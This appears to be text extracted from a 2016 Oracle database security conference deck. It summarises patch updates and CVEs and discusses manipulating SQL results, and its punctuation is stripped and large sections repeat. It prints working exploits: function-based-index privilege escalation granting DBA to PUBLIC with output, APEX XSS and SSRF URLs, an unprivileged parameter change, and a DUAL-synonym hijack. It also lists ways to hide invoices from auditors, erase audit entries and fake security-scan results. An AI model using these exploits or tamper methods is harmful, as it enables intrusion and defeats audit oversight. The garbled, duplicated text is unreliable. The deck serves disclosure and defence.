Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
